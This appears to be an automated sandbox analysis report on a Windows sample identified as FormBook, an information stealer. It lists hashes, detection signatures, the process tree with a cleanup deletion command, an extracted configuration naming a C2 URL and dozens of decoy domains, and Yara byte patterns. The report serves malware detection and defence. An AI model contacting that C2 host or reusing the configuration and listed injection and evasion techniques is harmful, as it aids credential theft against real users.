Play interactive tour

Edit tour

Windows Analysis Report 9JzK89dRiaBYTuN.exe

Overview

General Information

Sample Name:	9JzK89dRiaBYTuN.exe
Analysis ID:	458757
MD5:	d726ec6e056461dd7d3ce8890c3c9a4e
SHA1:	4f6b524ab5fa51d9c5465572de8075c857afb686
SHA256:	77d33d0e8b91781213a971ebc2e6abe4191bf2c28ff0ede19b07db092f590dff
Tags:	exenull
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Suspicious Process Start Without DLL

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

9JzK89dRiaBYTuN.exe (PID: 6048 cmdline: 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe' MD5: D726EC6E056461DD7D3CE8890C3C9A4E)

RegSvcs.exe (PID: 4260 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autofmt.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)

cmmon32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 6076 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.panyu-qqbaby.com/weni/"], "decoy": ["sdmdwang.com", "konversationswithkoshie.net", "carap.club", "eagldeream.com", "856380585.xyz", "elgallocoffee.com", "magetu.info", "lovertons.com", "theichallenge.com", "advancedautorepairsonline.com", "wingsstyling.info", "tapdaugusta.com", "wiloasbanhsgtarewdasc.solutions", "donjrisdumb.com", "experienceddoctor.com", "cloverhillconsultants.com", "underwear.show", "karensgonewild2020.com", "arodsr.com", "thefucktardmanual.com", "712kenwood.info", "telecompink.com", "ebizkendra.com", "kitkatmp3.com", "utformehagen.com", "profitsnavigator.com", "kathyharvey.com", "tongaoffshore.com", "vrpreservation.com", "hy7128.com", "nicolettejohnsonphotography.com", "rating.travel", "visualartcr.com", "nationalbarista.com", "lovecartoonforever.com", "koimkt.com", "directpractice.pro", "blockchaincloud360.com", "queverenbuenosaires.com", "coachmyragolden.com", "awree.com", "facebookipl.com", "rcheapwdbuy.com", "trinspinsgreen.com", "voxaide.com", "ecorner.online", "mattvickery.com", "regarta.com", "fknprfct.com", "theessentialstore.net", "sunilpsingh.com", "ovtnywveba.club", "optimalgafa.com", "awdjob.info", "humachem.com", "southeasternsteakcompany.com", "centerevents.net", "warrenswindowcleans.co.uk", "lebullterrier.com", "thecxchecker.com", "formerknown.com", "pupbutler.com", "tincanphones.com", "tgeuuy.cool"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2d26c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2d2a5a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2f98e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2f9c7a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2de76d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x30598d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2de259:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x305479:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2de86f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x305a8f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2de9e7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x305c07:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2d3472:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2fa692:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2dd4d4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x3046f4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2d41ea:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2fb40a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2e385f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x30aa7f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2e4902:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2e0791:$sqlite3step: 68 34 1C 7B E1 0x2e08a4:$sqlite3step: 68 34 1C 7B E1 0x3079b1:$sqlite3step: 68 34 1C 7B E1 0x307ac4:$sqlite3step: 68 34 1C 7B E1 0x2e07c0:$sqlite3text: 68 38 2A 90 C5 0x2e08e5:$sqlite3text: 68 38 2A 90 C5 0x3079e0:$sqlite3text: 68 38 2A 90 C5 0x307b05:$sqlite3text: 68 38 2A 90 C5 0x2e07d3:$sqlite3blob: 68 53 D8 7F 8C 0x2e08fb:$sqlite3blob: 68 53 D8 7F 8C 0x3079f3:$sqlite3blob: 68 53 D8 7F 8C 0x307b1b:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 9JzK89dRiaBYTuN.exe PID: 6048	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
1.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0.2.9JzK89dRiaBYTuN.exe.258d828.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc7638:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc79d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xee858:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xeebf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd36e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xfa905:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd31d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xfa3f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd37e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xfaa07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd395f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xfab7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc83ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xef60a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd244c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xf966c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc9162:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf0382:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xd87d7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xff9f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xd987a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd5709:$sqlite3step: 68 34 1C 7B E1 0xd581c:$sqlite3step: 68 34 1C 7B E1 0xfc929:$sqlite3step: 68 34 1C 7B E1 0xfca3c:$sqlite3step: 68 34 1C 7B E1 0xd5738:$sqlite3text: 68 38 2A 90 C5 0xd585d:$sqlite3text: 68 38 2A 90 C5 0xfc958:$sqlite3text: 68 38 2A 90 C5 0xfca7d:$sqlite3text: 68 38 2A 90 C5 0xd574b:$sqlite3blob: 68 53 D8 7F 8C 0xd5873:$sqlite3blob: 68 53 D8 7F 8C 0xfc96b:$sqlite3blob: 68 53 D8 7F 8C 0xfca93:$sqlite3blob: 68 53 D8 7F 8C
0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b360:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x26b6fa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x292580:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x29291a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x27740d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x29e62d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x276ef9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x29e119:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27750f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x29e72f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x277687:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x29e8a7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x26c112:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x293332:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x276174:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x29d394:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x26ce8a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2940aa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x27c4ff:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2a371f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x27d5a2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x279431:$sqlite3step: 68 34 1C 7B E1 0x279544:$sqlite3step: 68 34 1C 7B E1 0x2a0651:$sqlite3step: 68 34 1C 7B E1 0x2a0764:$sqlite3step: 68 34 1C 7B E1 0x279460:$sqlite3text: 68 38 2A 90 C5 0x279585:$sqlite3text: 68 38 2A 90 C5 0x2a0680:$sqlite3text: 68 38 2A 90 C5 0x2a07a5:$sqlite3text: 68 38 2A 90 C5 0x279473:$sqlite3blob: 68 53 D8 7F 8C 0x27959b:$sqlite3blob: 68 53 D8 7F 8C 0x2a0693:$sqlite3blob: 68 53 D8 7F 8C 0x2a07bb:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Start Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe' , ParentImage: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe, ParentProcessId: 6048, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4260

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe' , ParentImage: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe, ParentProcessId: 6048, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4260

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 9JzK89dRiaBYTuN.exe

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: www.panyu-qqbaby.com/weni/

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.panyu-qqbaby.com/weni/"], "decoy": ["sdmdwang.com", "konversationswithkoshie.net", "carap.club", "eagldeream.com", "856380585.xyz", "elgallocoffee.com", "magetu.info", "lovertons.com", "theichallenge.com", "advancedautorepairsonline.com", "wingsstyling.info", "tapdaugusta.com", "wiloasbanhsgtarewdasc.solutions", "donjrisdumb.com", "experienceddoctor.com", "cloverhillconsultants.com", "underwear.show", "karensgonewild2020.com", "arodsr.com", "thefucktardmanual.com", "712kenwood.info", "telecompink.com", "ebizkendra.com", "kitkatmp3.com", "utformehagen.com", "profitsnavigator.com", "kathyharvey.com", "tongaoffshore.com", "vrpreservation.com", "hy7128.com", "nicolettejohnsonphotography.com", "rating.travel", "visualartcr.com", "nationalbarista.com", "lovecartoonforever.com", "koimkt.com", "directpractice.pro", "blockchaincloud360.com", "queverenbuenosaires.com", "coachmyragolden.com", "awree.com", "facebookipl.com", "rcheapwdbuy.com", "trinspinsgreen.com", "voxaide.com", "ecorner.online", "mattvickery.com", "regarta.com", "fknprfct.com", "theessentialstore.net", "sunilpsingh.com", "ovtnywveba.club", "optimalgafa.com", "awdjob.info", "humachem.com", "southeasternsteakcompany.com", "centerevents.net", "warrenswindowcleans.co.uk", "lebullterrier.com", "thecxchecker.com", "formerknown.com", "pupbutler.com", "tincanphones.com", "tgeuuy.cool"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 9JzK89dRiaBYTuN.exe	Virustotal: Detection: 57%			Perma Link
Source: 9JzK89dRiaBYTuN.exe	ReversingLabs: Detection: 75%

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
